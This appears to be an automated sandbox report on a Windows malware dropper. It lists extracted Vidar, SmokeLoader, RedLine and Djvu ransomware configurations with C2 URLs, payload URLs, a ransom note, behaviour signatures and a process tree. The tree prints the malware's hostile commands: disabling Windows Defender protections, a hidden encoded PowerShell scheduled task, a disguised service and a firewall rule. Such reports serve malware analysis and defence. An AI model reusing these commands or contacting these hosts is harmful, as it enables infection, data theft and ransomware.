Analysis

  • max time kernel
    161s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220310-en
  • submitted
    12-03-2022 20:03

General

  • Target

    7c3f03e447f1dd80729807b0a615512e7813f0d9d21646c1fe419e72ff72455b.exe

  • Size

    3.1MB

  • MD5

    fd8a840f717d40f95b95e76b1ed2a118

  • SHA1

    425ff87a1cbd4959a23accd5c1ab732d855e09ce

  • SHA256

    7c3f03e447f1dd80729807b0a615512e7813f0d9d21646c1fe419e72ff72455b

  • SHA512

    a89ed4185c21aa4b186a97f7835e5868a018050569bde114b3b6ecadd28091df75f435dbf45999b1f904bd5cfa22009d54fb3b70af6e8d877c70351e1861d146

Malware Config

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

50.7

Botnet

937

C2

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

ruzki12_03

C2

176.122.23.55:11768

Attributes
  • auth_value

    c51ddc8008e8581a01cec6e8291c5530

Signatures

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 48 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 36 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 27 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c3f03e447f1dd80729807b0a615512e7813f0d9d21646c1fe419e72ff72455b.exe
    "C:\Users\Admin\AppData\Local\Temp\7c3f03e447f1dd80729807b0a615512e7813f0d9d21646c1fe419e72ff72455b.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4428
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_7.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3664
          • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_7.exe
            arnatic_7.exe
            5⤵
            • Executes dropped EXE
            PID:2472
            • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_7.exe
              C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_7.exe
              6⤵
              • Executes dropped EXE
              PID:1392
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3724
          • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_6.exe
            arnatic_6.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:328
            • C:\Users\Admin\Documents\OWo4FLhIAxKfUhwAAr4drHAV.exe
              "C:\Users\Admin\Documents\OWo4FLhIAxKfUhwAAr4drHAV.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1492
              • C:\Users\Admin\Documents\OWo4FLhIAxKfUhwAAr4drHAV.exe
                C:\Users\Admin\Documents\OWo4FLhIAxKfUhwAAr4drHAV.exe
                7⤵
                • Executes dropped EXE
                PID:5492
            • C:\Users\Admin\Documents\oqTWbkAkBDD6LaOkUtU1cerJ.exe
              "C:\Users\Admin\Documents\oqTWbkAkBDD6LaOkUtU1cerJ.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4000
            • C:\Users\Admin\Documents\m5PUeJtF2kZ8joJ8H5ZW6im1.exe
              "C:\Users\Admin\Documents\m5PUeJtF2kZ8joJ8H5ZW6im1.exe"
              6⤵
              • Executes dropped EXE
              PID:3580
            • C:\Users\Admin\Documents\UelCPYRAf2JUDKY_4zbFxbtu.exe
              "C:\Users\Admin\Documents\UelCPYRAf2JUDKY_4zbFxbtu.exe"
              6⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2744
              • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                7⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:5884
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                7⤵
                  PID:5128
              • C:\Users\Admin\Documents\zbnlE6hMMgVgNKHA9PWDPYXC.exe
                "C:\Users\Admin\Documents\zbnlE6hMMgVgNKHA9PWDPYXC.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:212
              • C:\Users\Admin\Documents\MtwOePjcKFb6tPUzNQMqc9oO.exe
                "C:\Users\Admin\Documents\MtwOePjcKFb6tPUzNQMqc9oO.exe"
                6⤵
                • Executes dropped EXE
                PID:1556
                • C:\Users\Admin\AppData\Local\Temp\7zS2013.tmp\Install.exe
                  .\Install.exe
                  7⤵
                  • Executes dropped EXE
                  PID:3752
                  • C:\Users\Admin\AppData\Local\Temp\7zS3428.tmp\Install.exe
                    .\Install.exe /S /site_id "525403"
                    8⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks computer location settings
                    • Drops file in System32 directory
                    • Enumerates system info in registry
                    PID:5160
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                      9⤵
                        PID:4284
                        • C:\Windows\SysWOW64\cmd.exe
                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                          10⤵
                            PID:5436
                            • \??\c:\windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                              11⤵
                                PID:5984
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                11⤵
                                  PID:5680
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                              9⤵
                                PID:5652
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                  10⤵
                                    PID:5916
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                      11⤵
                                        PID:6032
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                        11⤵
                                          PID:5692
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gRfRtEjKs" /SC once /ST 13:28:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      9⤵
                                      • Creates scheduled task(s)
                                      PID:4308
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gRfRtEjKs"
                                      9⤵
                                        PID:3452
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gRfRtEjKs"
                                        9⤵
                                          PID:4280
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 21:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\yibxqQt.exe\" j6 /site_id 525403 /S" /V1 /F
                                          9⤵
                                          • Drops file in Windows directory
                                          • Creates scheduled task(s)
                                          PID:5892
                                  • C:\Users\Admin\Documents\PEQszrUynUxACIB0zSb5fKXg.exe
                                    "C:\Users\Admin\Documents\PEQszrUynUxACIB0zSb5fKXg.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks processor information in registry
                                    PID:2924
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                      7⤵
                                      • Blocklisted process makes network request
                                      • Suspicious use of SetThreadContext
                                      PID:2472
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 892
                                      7⤵
                                      • Executes dropped EXE
                                      • Program crash
                                      PID:1316
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 976
                                      7⤵
                                      • Program crash
                                      PID:5776
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1032
                                      7⤵
                                      • Program crash
                                      PID:836
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1040
                                      7⤵
                                      • Program crash
                                      PID:2404
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1036
                                      7⤵
                                      • Program crash
                                      PID:2316
                                  • C:\Users\Admin\Documents\Oc0SgNqcKail_6qHRrAB79_l.exe
                                    "C:\Users\Admin\Documents\Oc0SgNqcKail_6qHRrAB79_l.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:3092
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\Oc0SgNqcKail_6qHRrAB79_l.exe
                                      7⤵
                                        PID:5528
                                        • C:\Windows\system32\choice.exe
                                          choice /C Y /N /D Y /T 0
                                          8⤵
                                            PID:3368
                                      • C:\Users\Admin\Documents\HBlO2xHTEVGPr_mgST621Qvh.exe
                                        "C:\Users\Admin\Documents\HBlO2xHTEVGPr_mgST621Qvh.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4952
                                        • C:\Users\Admin\Documents\HBlO2xHTEVGPr_mgST621Qvh.exe
                                          "C:\Users\Admin\Documents\HBlO2xHTEVGPr_mgST621Qvh.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5352
                                      • C:\Users\Admin\Documents\PVpH9AntETWJQOj25pBa7RqC.exe
                                        "C:\Users\Admin\Documents\PVpH9AntETWJQOj25pBa7RqC.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:3812
                                      • C:\Users\Admin\Documents\ReBXfoTc6d4AkHXwU2MwOMwN.exe
                                        "C:\Users\Admin\Documents\ReBXfoTc6d4AkHXwU2MwOMwN.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        • Adds Run key to start application
                                        PID:3784
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\asxefvjw\
                                          7⤵
                                            PID:5540
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezokegez.exe" C:\Windows\SysWOW64\asxefvjw\
                                            7⤵
                                              PID:5680
                                            • C:\Windows\SysWOW64\sc.exe
                                              "C:\Windows\System32\sc.exe" create asxefvjw binPath= "C:\Windows\SysWOW64\asxefvjw\ezokegez.exe /d\"C:\Users\Admin\Documents\ReBXfoTc6d4AkHXwU2MwOMwN.exe\"" type= own start= auto DisplayName= "wifi support"
                                              7⤵
                                                PID:5956
                                              • C:\Windows\SysWOW64\sc.exe
                                                "C:\Windows\System32\sc.exe" description asxefvjw "wifi internet conection"
                                                7⤵
                                                  PID:6052
                                                • C:\Windows\SysWOW64\sc.exe
                                                  "C:\Windows\System32\sc.exe" start asxefvjw
                                                  7⤵
                                                    PID:6124
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                    7⤵
                                                      PID:3548
                                                    • C:\Users\Admin\nbceglyb.exe
                                                      "C:\Users\Admin\nbceglyb.exe" /d"C:\Users\Admin\Documents\ReBXfoTc6d4AkHXwU2MwOMwN.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:2220
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kbcegxmf.exe" C:\Windows\SysWOW64\asxefvjw\
                                                        8⤵
                                                          PID:5840
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" config asxefvjw binPath= "C:\Windows\SysWOW64\asxefvjw\kbcegxmf.exe /d\"C:\Users\Admin\nbceglyb.exe\""
                                                          8⤵
                                                            PID:5636
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start asxefvjw
                                                            8⤵
                                                              PID:6104
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                              8⤵
                                                                PID:6048
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 648
                                                                8⤵
                                                                • Program crash
                                                                PID:6052
                                                          • C:\Users\Admin\Documents\2yt7JZebziaKon_o6F6z0eOD.exe
                                                            "C:\Users\Admin\Documents\2yt7JZebziaKon_o6F6z0eOD.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3308
                                                          • C:\Users\Admin\Documents\1GCgHiXc8OWyCnJiq1GQcOPh.exe
                                                            "C:\Users\Admin\Documents\1GCgHiXc8OWyCnJiq1GQcOPh.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Checks computer location settings
                                                            • Adds Run key to start application
                                                            PID:2512
                                                            • C:\Users\Admin\AppData\Local\Temp\dada.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\dada.exe"
                                                              7⤵
                                                                PID:1316
                                                              • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                PID:2228
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                                  8⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:5388
                                                            • C:\Users\Admin\Documents\19ANkpEBZQizP6qaOCUO86hl.exe
                                                              "C:\Users\Admin\Documents\19ANkpEBZQizP6qaOCUO86hl.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              PID:2604
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 452
                                                                7⤵
                                                                • Program crash
                                                                PID:4392
                                                            • C:\Users\Admin\Documents\8pDohGOKosB99TLwsIZ9IbC9.exe
                                                              "C:\Users\Admin\Documents\8pDohGOKosB99TLwsIZ9IbC9.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks processor information in registry
                                                              PID:4252
                                                            • C:\Users\Admin\Documents\e3twqah84mBOHdTXD97v9yB6.exe
                                                              "C:\Users\Admin\Documents\e3twqah84mBOHdTXD97v9yB6.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Checks BIOS information in registry
                                                              • Checks whether UAC is enabled
                                                              • Suspicious use of SetThreadContext
                                                              PID:4800
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                7⤵
                                                                  PID:5512
                                                              • C:\Users\Admin\Documents\aRqwpD9GcaA1tkpujYkASnOB.exe
                                                                "C:\Users\Admin\Documents\aRqwpD9GcaA1tkpujYkASnOB.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:4060
                                                              • C:\Users\Admin\Documents\h8EN1szUCX4erUa6rg9eZHy2.exe
                                                                "C:\Users\Admin\Documents\h8EN1szUCX4erUa6rg9eZHy2.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                PID:3976
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 472
                                                                  7⤵
                                                                  • Program crash
                                                                  PID:5504
                                                              • C:\Users\Admin\Documents\VYV1SeRtapW7HcJbblRtm4Gu.exe
                                                                "C:\Users\Admin\Documents\VYV1SeRtapW7HcJbblRtm4Gu.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Checks computer location settings
                                                                PID:620
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "VYV1SeRtapW7HcJbblRtm4Gu.exe" /f & erase "C:\Users\Admin\Documents\VYV1SeRtapW7HcJbblRtm4Gu.exe" & exit
                                                                  7⤵
                                                                    PID:5932
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im "VYV1SeRtapW7HcJbblRtm4Gu.exe" /f
                                                                      8⤵
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5212
                                                                • C:\Users\Admin\Documents\8Yik7V3AwiV7FN9O7sAbp6qX.exe
                                                                  "C:\Users\Admin\Documents\8Yik7V3AwiV7FN9O7sAbp6qX.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  PID:4992
                                                                • C:\Users\Admin\Documents\3iIoB_n0W4wMxKNrzbz45cFD.exe
                                                                  "C:\Users\Admin\Documents\3iIoB_n0W4wMxKNrzbz45cFD.exe"
                                                                  6⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  • Loads dropped DLL
                                                                  • Checks processor information in registry
                                                                  PID:4328
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 3iIoB_n0W4wMxKNrzbz45cFD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\3iIoB_n0W4wMxKNrzbz45cFD.exe" & del C:\ProgramData\*.dll & exit
                                                                    7⤵
                                                                      PID:5376
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /im 3iIoB_n0W4wMxKNrzbz45cFD.exe /f
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        PID:6140
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /t 6
                                                                        8⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:3340
                                                                  • C:\Users\Admin\Documents\UJjtCnjdP8UmcS1vspzKrQAG.exe
                                                                    "C:\Users\Admin\Documents\UJjtCnjdP8UmcS1vspzKrQAG.exe"
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1444
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3640
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_5.exe
                                                                  arnatic_5.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3948
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3488
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_4.exe
                                                                  arnatic_4.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:332
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:1556
                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:1836
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3364
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_3.exe
                                                                  arnatic_3.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:32
                                                                  • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                    "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                                    6⤵
                                                                    • Loads dropped DLL
                                                                    PID:2796
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 604
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:1580
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3564
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_2.exe
                                                                  arnatic_2.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Checks SCSI registry key(s)
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious behavior: MapViewOfSection
                                                                  PID:3836
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3712
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS08A92CCD\arnatic_1.exe
                                                                  arnatic_1.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Modifies system certificate store
